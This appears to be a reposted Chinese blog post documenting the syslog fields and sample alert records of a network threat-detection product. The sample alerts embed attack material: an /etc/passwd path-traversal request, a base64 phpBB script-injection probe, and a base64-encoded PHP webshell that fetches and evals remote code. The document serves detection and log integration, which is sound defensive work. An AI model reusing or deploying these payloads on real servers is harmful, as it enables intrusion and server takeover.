码迷,mamicode.com
首页 > 其他好文 > 详细

syslog格式说明

时间:2019-10-14 12:34:44      阅读:137      评论:0      收藏:0      [点我收藏+]

标签:tls   方式   pass   ack   状态   shel   wing   ref   fence   

1 告警日志

1.1.1 字段说明

字段名称 字段含义
access_time 告警时间
alarm_sip 受害ip
attack_org 攻击组织
attack_sip 攻击ip
attack_type 攻击类型
file_md5 文件md5
file_name 文件名
hazard_level 威胁级别
host 域名
host_md5 域名md5
ioc ioc
nid nid
rule_key 规则类型
serial_num 联动设备序列号
skyeye_type 原始日志类型
type 告警二级分类
super_type 告警一级分类
type_chain 告警子类标签编码
host_state 攻击结果
confidence 确信度
vuln_type 威胁名称
attack_chain 攻击链标签二级编号
super_attack_chain 攻击链标签一级编号
is_web_attack 是否web攻击

1.1.2 字典类型字段说明

hazard_level威胁级别:
1、2、3 低危
4、5 中危
6、7 高危
8、9、10 危急

1.1.3 范例

发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间                      客户端IP           日志类型                日志
2018-04-23 15:16:37|!172.17.20.159|!alarm|!{"attack_type": "", "first_access_time": "2018-04-18T11:05:07.000+0800", "ioc": "3306", "access_time": "2018-04-18T11:05:07.000+0800", "alarm_sip": "63.3.5.7", "nid": "17298326168730075144", "attack_sip": "11.1.1.18", "hazard_level": 7, "super_type": "攻击利用", "type": "自定义情报告警", "sip_ioc_dip": "31d51ab43633a6d4f5ef926a856dddd8"}


1.2 系统日志

1.2.1 字段说明

字段名称 字段含义
name 警告内容
value 当前值

1.2.2 范例

发送syslog的格式为 : (facility = local3,日志级别为:info)
发送时间                      客户端IP   日志类型                日志
2018-05-14 15:10:52|!10.91.4.13|!log|![{"name": "空闲CPU百分比太低", "value": 19.7}, {"name": "15分钟平均CPU负载太高", "value": 35.1}]


1.3 原始告警

1.3.1 字段说明

告警字段一:webids-webattack_dolog 网页漏洞利用

字段名称 字段含义
attack_type 攻击类型
attack_type_all 攻击类型(全)
referer HTTP-来源
file_name 文件名
agent 代理
victim 受害者
sport 源端口
rsp_status 相应状态
sip 源IP
severity 危害级别
rsp_body_len 相应体长度
serial_num 采集设备序列号
rsp_content_type 响应内容类型
parameter HTTP请求参数
method 攻击方法
req_body 请求体
req_header 请求头
rule_name 规则名称
host 域名
cookie cookie
write_date 写入时间
attacker 攻击者
victim_type 受攻击者类型
attack_flag 攻击标识
uri URI
rsp_content_length 响应内容长度
rule_version 规则版本
rsp_body 响应体
rsp_header 响应头
dport 目的端口
dolog_count 告警次数
dip 目的IP
rule_id 规则ID
confidence 确信度
detail_info 告警详细信息
solution 解决方案
vuln_desc 攻击描述
vuln_harm 攻击危害
vuln_name 威胁名称
vuln_type 威胁类型
webrules_tag web攻击类规则标签
public_date 发布时间
code_language 使用语言
site_app 建站app
kill_chain 攻击链
kill_chain_all 攻击链(全)
instranet_rule_all 内部网络规则
attack_result 攻击结果
xff xff代理

告警字段二:webids-webshell_dolog webshell上传

字段名称 字段含义
attack_type 攻击类型
attack_type_all 攻击类型(全)
attack_flag 攻击标识
sip 源IP
write_date 写入时间
victim 受害者
file_dir 文件目录
url URL
victim_type 受攻击者类型
file_md5 附件MD5
serial_num 采集设备序列号
attacker 攻击者
host 域名
file 文件
dport 目的端口
sport 源端口
dip 目的IP
rule_ip 规则ID
severity 危害级别
confidence 确信度
detail_info 告警详细信息
attack_desc 攻击描述
attack_harm 攻击危害
rule_name 规则名称
kill_chain 攻击链
kill_chain_all 攻击链(全)
attack_result 攻击结果
xff xff代理

告警字段三:webids_ids_dolog 网络攻击

字段名称 字段含义
attack_type 攻击类型
attack_type_all 攻击类型(全)
dip 目的IP
packet_data 载荷内容
victim 受害者
sport 源端口
affected_system 影响的系统
sip 源IP
severity 危害级别
detail_info 告警详细信息
attacker 攻击者
packet_size 载荷大小
info_id 漏洞编号
description 网络攻击描述
sig_id 特征编号
rule_name 规则名称
write_date 写入时间
protocol_id 网络攻击协议
attack_method 攻击方法
attcak_flag 攻击标志
rule_id 规则ID
serial_num 采集设备序列号
appid 应用ID
dport 目的端口
vuln_type 威胁类型
victim_type 受攻击者类型
bulletin 解决方案
confidence 确信度
webrules_tag web攻击类规则标签
ids_rule_version IDS规则版本号
cnnvd_id CNNVD编号
kill_chain 攻击链
kill_chain_all 攻击链(全)
instranet_rule_all 内部网络规则
attack_result 攻击结果
xff xff代理

告警字段四:webids_ioc_dolog 威胁情报

字段名称 字段含义
access_time 日志产生时间
tid 恶意家族ID
type 恶意事件类型
rule_desc 规则详情
offence_type 关注类型
offence_value 关注内容
sip 源IP
dip 目的IP
serverity 危害级别
serial_num 采集设备序列号
rule_state 规则状态
ioc_type 规则类型
ioc_value 规则内容
nid IOCw唯一编号
etime 结束时间
malicious_type 威胁类型
kill_chain 攻击链
kill_chain_all 攻击链(全)
xml_confidence 确信度
malicious_family 恶意家族
campaign 攻击时间/团伙
targeted 定向攻击
tag 恶意家族标签
paltform 影响平台
current_status 当前状态
packed_data 载荷内容
ioc_source 威胁情报源
sport 源端口
dport 目的端口
proto 协议
dns_type DNS类型
filename 文件名称
file_md5 文件MD5
desc 描述
file_direction 文件传输方向
host 域名
uri URL
dns_arecord DNS记录
tproto 传输层协议
file_content 文件内容
attack_ip 攻击IP
victim_ip 受害IP
attack_type 攻击类型
attack_type_all 攻击类型(全)
xff xff代理

1.3.2 字典类型字段说明

hazard_rating威胁级别:
1、2、3 低危
4、5 中危
6、7 高危
8、9、10 危急

host_state告警结果:
0 企图
1 攻击成功
2 失陷

1.3.3 范例

webids-ioc_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间                      客户端IP           日志类型                日志
2019-08-15 17:50:47|!10.91.4.198|!webids-ioc_dolog|!{"rule_desc": "APT17 APT组织活动事件", "campaign": "APT17", "@timestamp": "2019-08-15T17:00:07.946+0800", "packet_data": "AJALLmC1AFBWogIqCABFAABAh5tAAEARxOUKBQAd3wUFBaEjADUALHr7l9Q BAAABAAAAAAAAA2FsaQpibGFua2NoYWlyA2NvbQAAAQAB", "dns_arecord": "", "tproto": "udp", "host_reraw": "com.blankchair.ali", "sport": 41251, "host_raw": "ali.blankchair.com", "attack_ip": "", "ioc_type": "host", "etime": "2017-03-08 13:33:11", "attack_type": "APT事件", "sip": "10.5.0.29","severity": 9, "proto": "dns", "kill_chain_all": "命令控制:0x03000000|命令 控制服务器连接:0x030a0000", "filename": "", "serial_num": "QbJK/cNEg", "dns_type": 0, "rule_state": "green", "tid": 1, "attack_type_all": "APT事件:10000000|APT事件:10010000", "type": "KNOWN APT", "uri_md5": "d41d8cd98f00b204e9800998ecf8427e", "targeted": true, "access_time": 1565859693000, "nid": "1161928703861588190","file_md5": "", "kill_chain": "c2", "offence_value": "10.5.0.29", "host": "ali.blankchair.com", "victim_ip": "10.5.0.29", "malicious_family": "Unknown", "geo_dip": {"subdivision": "Zhejiang Sheng", "country_code2": "CN", "longitude": "120.1614", "latitude": "30.2936", "continent_code": "AS", "city_name": "Hangzhou"}, "desc": "APT 17活动详情\n\nAPT 17是在2015年8月被FireEye公开揭露出来的一个 APT组织,最早的活动可以追溯到2013年。相关行动的主要细节如下:\n\n使用的攻击方式:水坑\n涉及行业:日本软件公司\n受影响国家:日本\n相关 技术:\n\t\t\t1、使用的远控木马为:BLACKCOFFEE, WEBCnC, Joy RAT, PlugX。\n\t\t\t 2、该组织通过窃取日本软件公司的证书然后给恶意软件签名,诱使目标下载安装BLACKOFFICE后门。\n\t\t\t 3、其他别名:Deputy Dog、Aurora Panda。\n\t\t\t\n\t\t\t\n 参考链接:\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\n", "xml_confidence": "high", "offence_type": "sip", "host_md5": "97419d43006658e6d6f3a6446ee83fa2", "@version": "6", "uri": "", "current_status": "inactive", "ioc_source": 0, "ioc_value": "ali.blankchair.com", "dport": 53, "dip": "223.5.5.5", "malicious_type": "APT事件"}

webids-ids_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间                      客户端IP           日志类型                日志
2019-08-15 17:50:45|!10.91.4.198|!webids-ids_dolog|!{"intranet_rule_all": null, "ids_rule_version": "1.0", "cnnvd_id": "", "description": "1", "appid": 77, "packet_data": "UFeo1Lt/AAwphPOJCABFAAE7ewtAAEAGqGEKEwEVChMBFptiA FCb/E2ZyqJLgVAYAC4O7QAAR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU 3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JT U0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJ TI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50 OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS41KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAx Mzg5KQ0KSG9zdDogd3d3LjM2MC5jbg0KDQo=", "xff": null, "kill_chain": "0x02010000", "rule_name": "phpBB Viewtopic.PHP PHP Highlight Script Injection Vulnerability", "webrules_tag": "1", "attack_result": "0", "victim": "10.19.1.22", "dport": 80, "bulletin": "", "sport": 39778, "affected_system": "", "attack_type": "代码执行", "confidence": 50, "sip": "10.19.1.21", "severity": 6, "protocol_id": 6, "attack_method": "", "attack_flag": "true", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "phpBB 2.x versions prior to version 2.0.11 are prone to a script injection vulnerability while parsing certain crafted HTTP requests. The vulnerability is due to the lack of proper checks on highlights in the HTTP request, allowing for a remote code execution. An attacker could exploit the vulnerability by sending a crafted HTTP request. A successful attack could lead to a remote code execution with the privileges of the server.\n\n
Reference:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2, http://marc.theaimsgroup.com/?t=110079440800004&r=1&w=2,http://marc.theaimsgroup.com/?l=bugtraq&m=110365752909029&w=2, http://marc.theaimsgroup.com/?l=bugtraq&m=110143995118428&w=2,http://www.us-cert.gov/cas/techalerts/TA04-356A.html, http://www.kb.cert.org/vuls/id/497400,http://secunia.com/advisories/13239/,http://xforce.iss.net/xforce/xfdb/18052", "attacker": "10.19.1.21", "packet_size": 329, "info_id": "9506", "attack_type_all": "攻击利用:16000000|代码执行:16030000", "serial_num": "QbJK/cNEg", "sig_id": 33590712, "write_date": 1565857707, "victim_type": "server", "vuln_type": "代码执行", "dip": "10.19.1.22", "rule_id": 2414}

webids-webattack_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间                      客户端IP           日志类型                日志
2019-08-15 17:50:45|!10.91.4.198|!webids-webattack_dolog|!{"webrules_tag": "1", "referer": " http://www.baidu.com:80/", "file_name": "", "@timestamp": "2019-08-15T16:33:07.619+0800", "agent": "", "solution": "对此类敏感请求进行拦截。", "host_reraw": "com.baidu.www", "attack_result": "0", "victim": "10.19.1.23", "sport": 57400, "attack_type": "默认配置不当", "rsp_status": 0, "sip": "10.19.1.22", "severity": 6, "rsp_body_len": 0, "public_date": "2018-08-30 16:27:11", "kill_chain_all": "侦察:0x01000000|信息泄露:0x01020000", "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "serial_num": "QbJK/cNEg", "rsp_content_type": "", "vuln_name": "发现尝试请求Linux下敏感文件", "vuln_harm": "此类请求行为一旦成功, 攻击者可通过访问敏感信息实施进一步的攻击。", "parameter": "cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "method": "GET", "req_body": "", "uri_md5": "3167e39c45796fff2ec661320c219333", "req_header": "GET /s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1 HTTP/1.1\r\n Referer: http://www.baidu.com:80/\r\nCookie: BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24 FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1\r\nHost: www.baidu.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\r\nAccept: */*\r\n\r\n", "confidence": 50, "kill_chain": "0x01020000", "rule_name": "发现尝试请求Linux下敏感文件", "host": "www.baidu.com", "cookie": " BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1", "@version": "6", "write_date": 1565858082, "code_language": "其他", "site_app": "其他", "host_md5": "dab19e82e1f9a681ee73346d3e7a575e", "attacker": "10.19.1.22", "victim_type": "server", "attack_flag": "true", "uri": "/s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "rsp_content_length": 0, "vuln_desc": "发现在 HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "rule_version": 1, "attack_type_all": "攻击利用:16000000|配置不当/错误:160C0000", "rsp_body": "", "rsp_header": "", "dport": 80, "dolog_count": 1, "vuln_type": "默认配置不当", "dip": "10.19.1.23", "rule_id": 268567921, "host_raw": "www.baidu.com"}

webids-webshell_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间                      客户端IP           日志类型                日志
2019-08-15 17:50:46|!10.91.4.198|!webids-webshell_dolog|!{"file": "PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCnNlc3Npb25fc3RhcnQoKTsNCmhlYWRlcigiQ29 udGVudC10eXBlOnRleHQvaHRtbDtjaGFyc2V0PWdiayIpOw0KJHBhc3N3b3JkID0gInB1an llaDRpZmxpdWV2bSI7IA0KaWYoZW1wdHkoJF9TRVNTSU9OWydhcGkxMjM0J10pKSANCgkkX1 NFU1NJT05bJ2FwaTEyMzQnXT1maWxlX2dldF9jb250ZW50cyhzcHJpbnRmKCclcz8lcycscGF jaygiSCoiLCc2ODc0NzQ3MDNBMkYyRjMxMzIzMzJFMzEzMjM1MkUzMTMxMzQyRTM4MzIyRjZBN zg2NjYyNzU2MzZCNjU3NDMyMzAzMTM0MzEyRjY4NjE2MzZCMkYzMTJFNkE3MDY3JyksdW5pcWlkK CkpKTsNCmlmKHN0cmlwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdiYWlkdScpKzA9 PTApIGV4aXQ7DQppZihzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwnbXljY 3MnKSswPT0wKSBleGl0OwkNCigkYjRkYm95ID0gZ3p1bmNvbXByZXNzKCRfU0VTU0lPTlsnYXBpM TIzNCddKSkgJiYgQHByZWdfcmVwbGFjZSgnL2FkL2UnLCdAJy5zdHJfcm90MTMoJ3JpbnknKS4nKC RiNGRib3kpJywgJ2FkZCcpOw0KPz4=", "@timestamp": "2019-08-15T16:28:14.421+0800", "host_reraw": "171:8081.66.16.10","attack_result": "0", "victim": "10.16.66.171", "sport": 45299, "attack_type": "加密后门", "confidence": 80, "sip": "192.168.61.133", "severity": 8, "file_dir": "upload", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过安全性控制而获取对程序或 系统访问权的程序。该后门文件在调用>某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数, 比如base64_decode/create_function/chr等,具有后门的显著特征,可实现对服务器的操作和控制。", "serial_num": "QbJK/cNEg", "attack_harm": "服务器被植入后门程序后可能导致以下后果: 1.整个网站或者服务器被黑客控制,变成傀儡主机;2.核心数据被窃取,造成用户信息泄露。", "file_md5": "55c1a4fee7821c8689dc4fd895f593ed", "kill_chain": "0x02010000", "attacker": "192.168.61.133", "host": "10.16.66.171:8081", "@version": "6", "write_date": 1565857831, "attack_desc": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过>安全性控制而获取对程序或系统访问权的程序。 该后门文件在调用某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数,比如base64_decode/create_function/chr等, 具有后门的显著特征,可实现对>服务器的操作和控制。", "host_md5": "28713b58235ab268378f0af86cecaa64", "rule_name": "加密后门.B", "url": "/upload/upload.php", "dip": "10.16.66.171", "attack_flag": "true", "webrules_tag": "1", "attack_type_all": "攻击利用:16000000|webshell上传:161C0000", "dport": 8081, "victim_type": "server", "rule_id": 10027, "host_raw": "10.16.66.171:8081"}

syslog格式说明

标签:tls   方式   pass   ack   状态   shel   wing   ref   fence   

原文地址:https://www.cnblogs.com/tida-blogs/p/11670688.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!